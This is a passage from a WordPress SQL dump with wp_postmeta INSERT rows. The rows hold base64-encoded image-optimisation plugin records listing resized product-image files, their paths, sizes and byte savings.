d3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10aHJlYWQtc2VhbGFudC0yNTB4MjUwLnBuZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10aHJlYWQtc2VhbGFudC0yNTB4MjUwLnBuZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9wbmciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRocmVhZC1zZWFsYW50LTI1MHgyNTAucG5nIiwicmVkdWN0aW9uIjoxNTAyMywidGltZSI6MTQ4MzU5MjQxNywiaWQiOjk4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdGhyZWFkLXNlYWxhbnQtMjAweDIwMC5wbmciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdGhyZWFkLXNlYWxhbnQtMjAweDIwMC5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC10aHJlYWQtc2VhbGFudC0yMDB4MjAwLnBuZyIsInJlZHVjdGlvbiI6OTUzNCwidGltZSI6MTQ4MzU5MjQyMSwiaWQiOjk4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdGhyZWFkLXNlYWxhbnQtMjI1eDIyNS5wbmciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdGhyZWFkLXNlYWxhbnQtMjI1eDIyNS5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC10aHJlYWQtc2VhbGFudC0yMjV4MjI1LnBuZyIsInJlZHVjdGlvbiI6MTIzMTUsInRpbWUiOjE0ODM1OTI0MjYsImlkIjo5ODh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdGhyZWFkLXNlYWxhbnQtMTE0eDEzMC5wbmciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdGhyZWFkLXNlYWxhbnQtMTE0eDEzMC5wbmciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdGhyZWFkLXNlYWxhbnQtMTE0eDEzMC5wbmciLCJyZWR1Y3Rpb24iOjM2MjAsInRpbWUiOjE0ODM1OTI0MzAsImlkIjo5ODh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdGhyZWFkLXNlYWxhbnQtMTgweDE4MC5wbmciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdGhyZWFkLXNlYWxhbnQtMTgweDE4MC5wbmciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdGhyZWFkLXNlYWxhbnQtMTgweDE4MC5wbmciLCJyZWR1Y3Rpb24iOjc3NDEsInRpbWUiOjE0ODM1OTI0MzQsImlkIjo5ODh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdGhyZWFkLXNlYWxhbnQtMjQ3eDMwMC5wbmciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdGhyZWFkLXNlYWxhbnQtMjQ3eDMwMC5wbmciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdGhyZWFkLXNlYWxhbnQtMjQ3eDMwMC5wbmciLCJyZWR1Y3Rpb24iOjE3NTI5LCJ0aW1lIjoxNDgzNTkyNDQwLCJpZCI6OTg4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRocmVhZC1zZWFsYW50LTMwMHgzMDAucG5nIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRocmVhZC1zZWFsYW50LTMwMHgzMDAucG5nIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRocmVhZC1zZWFsYW50LTMwMHgzMDAucG5nIiwicmVkdWN0aW9uIjoyMTM5OCwidGltZSI6MTQ4MzU5MjQ0NSwiaWQiOjk4OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10aHJlYWQtc2VhbGFudC00MDB4NDAwLnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10aHJlYWQtc2VhbGFudC00MDB4NDAwLnBuZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC10aHJlYWQtc2VhbGFudC00MDB4NDAwLnBuZyIsInJlZHVjdGlvbiI6MzY4NjYsInRpbWUiOjE0ODM1OTI0NTIsImlkIjo5ODh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30481, 854, 'wpfc_optimisation_reduction', '347514'); 
INSERT INTO `wp_postmeta` VALUES (30482, 854, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjIybi5wbmciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIyMm4ucG5nIiwid2lkdGgiOjE2ODAsImhlaWdodCI6OTExLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjIybi5wbmciLCJyZWR1Y3Rpb24iOjE5MDU4NiwidGltZSI6MTQ4MzU5MjQ3NCwiaWQiOiI4NTQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIyMm4tMzQweDM0MC5wbmciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMjJuLTM0MHgzNDAucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMjJuLTM0MHgzNDAucG5nIiwicmVkdWN0aW9uIjoxNTI4OSwidGltZSI6MTQ4MzU5MjQ4MSwiaWQiOjg1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMjJuLTgwMHg0MzQucG5nIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo0MzQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjIybi04MDB4NDM0LnBuZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9wbmciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjIybi04MDB4NDM0LnBuZyIsInJlZHVjdGlvbiI6MTY2ODQsInRpbWUiOjE0ODM1OTI0OTIsImlkIjo4NTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjIybi03Njh4NDE2LnBuZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NDE2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIyMm4tNzY4eDQxNi5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIyMm4tNzY4eDQxNi5wbmciLCJyZWR1Y3Rpb24iOjE1MzU1LCJ0aW1lIjoxNDgzNTkyNTAxLCJpZCI6ODU0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIyMm4tMTYwMHg4NjgucG5nIiwid2lkdGgiOjE2MDAsImhlaWdodCI6ODY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIyMm4tMTYwMHg4NjgucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMjJuLTE2MDB4ODY4LnBuZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MjUyOCwiaWQiOjg1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMjJuLTI1MHgyNTAucG5nIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjIybi0yNTB4MjUwLnBuZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9wbmciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjIybi0yNTB4MjUwLnBuZyIsInJlZHVjdGlvbiI6Nzg0NiwidGltZSI6MTQ4MzU5MjUzMywiaWQiOjg1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMjJuLTIwMHgyMDAucG5nIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjIybi0yMDB4MjAwLnBuZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9wbmciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjIybi0yMDB4MjAwLnBuZyIsInJlZHVjdGlvbiI6NDg1MCwidGltZSI6MTQ4MzU5MjUzNywiaWQiOjg1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMjJuLTIyNXgyMjUucG5nIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjIybi0yMjV4MjI1LnBuZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9wbmciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjIybi0yMjV4MjI1LnBuZyIsInJlZHVjdGlvbiI6NjI1OCwidGltZSI6MTQ4MzU5MjU0MiwiaWQiOjg1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMjJuLTUxMHg2MDAucG5nIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjIybi01MTB4NjAwLnBuZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9wbmciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjIybi01MTB4NjAwLnBuZyIsInJlZHVjdGlvbiI6NDIxODgsInRpbWUiOjE0ODM1OTI1NTMsImlkIjo4NTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMjJuLTExNHgxMzAucG5nIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjIybi0xMTR4MTMwLnBuZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIyMm4tMTE0eDEzMC5wbmciLCJyZWR1Y3Rpb24iOjE3NjksInRpbWUiOjE0ODM1OTI1NTYsImlkIjo4NTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMjJuLTE4MHgxODAucG5nIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjIybi0xODB4MTgwLnBuZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIyMm4tMTgweDE4MC5wbmciLCJyZWR1Y3Rpb24iOjM5NTksInRpbWUiOjE0ODM1OTI1NjAsImlkIjo4NTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMjJuLTI0N3gzMDAucG5nIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjIybi0yNDd4MzAwLnBuZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzIyMm4tMjQ3eDMwMC5wbmciLCJyZWR1Y3Rpb24iOjEwMDEyLCJ0aW1lIjoxNDgzNTkyNTY2LCJpZCI6ODU0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMjIybi0zMDB4MzAwLnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIyMm4tMzAweDMwMC5wbmciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yMjJuLTMwMHgzMDAucG5nIiwicmVkdWN0aW9uIjoxMTQ1MSwidGltZSI6MTQ4MzU5MjU3MSwiaWQiOjg1NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzIyMm4tNDAweDQwMC5wbmciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yMjJuLTQwMHg0MDAucG5nIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMjIybi00MDB4NDAwLnBuZyIsInJlZHVjdGlvbiI6MjEyNjYsInRpbWUiOjE0ODM1OTI1NzksImlkIjo4NTR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30483, 627, 'wpfc_optimisation_reduction', '19074'); 
INSERT INTO `wp_postmeta` VALUES (30484, 627, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsZ2xpZGUtZTE0NzE2MjQ3Njg0NjUucG5nIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxnbGlkZS1lMTQ3MTYyNDc2ODQ2NS5wbmciLCJ3aWR0aCI6Mjc1LCJoZWlnaHQiOjExNCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21pbGdsaWRlLWUxNDcxNjI0NzY4NDY1LnBuZyIsInJlZHVjdGlvbiI6MzY4NCwidGltZSI6MTQ4MzU5MjU4NSwiaWQiOiI2MjcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGdsaWRlLWUxNDcxNjI0NzY4NDY1LTI1MHgxMTQucG5nIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoxMTQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsZ2xpZGUtZTE0NzE2MjQ3Njg0NjUtMjUweDExNC5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21pbGdsaWRlLWUxNDcxNjI0NzY4NDY1LTI1MHgxMTQucG5nIiwicmVkdWN0aW9uIjozNjIwLCJ0aW1lIjoxNDgzNTkyNTg5LCJpZCI6NjI3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGdsaWRlLWUxNDcxNjI0NzY4NDY1LTIwMHgxMTQucG5nIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoxMTQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsZ2xpZGUtZTE0NzE2MjQ3Njg0NjUtMjAweDExNC5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21pbGdsaWRlLWUxNDcxNjI0NzY4NDY1LTIwMHgxMTQucG5nIiwicmVkdWN0aW9uIjozMDgyLCJ0aW1lIjoxNDgzNTkyNTkyLCJpZCI6NjI3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL21pbGdsaWRlLWUxNDcxNjI0NzY4NDY1LTIyNXgxMTQucG5nIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoxMTQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsZ2xpZGUtZTE0NzE2MjQ3Njg0NjUtMjI1eDExNC5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21pbGdsaWRlLWUxNDcxNjI0NzY4NDY1LTIyNXgxMTQucG5nIiwicmVkdWN0aW9uIjozMzcwLCJ0aW1lIjoxNDgzNTkyNTk2LCJpZCI6NjI3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsZ2xpZGUtZTE0NzE2MjQ3Njg0NjUtMTE0eDExNC5wbmciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxnbGlkZS1lMTQ3MTYyNDc2ODQ2NS0xMTR4MTE0LnBuZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTE0IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL21pbGdsaWRlLWUxNDcxNjI0NzY4NDY1LTExNHgxMTQucG5nIiwicmVkdWN0aW9uIjoxNjk5LCJ0aW1lIjoxNDgzNTkyNTk5LCJpZCI6NjI3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvbWlsZ2xpZGUtZTE0NzE2MjQ3Njg0NjUtMjQ3eDExNC5wbmciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9taWxnbGlkZS1lMTQ3MTYyNDc2ODQ2NS0yNDd4MTE0LnBuZyIsIndpZHRoI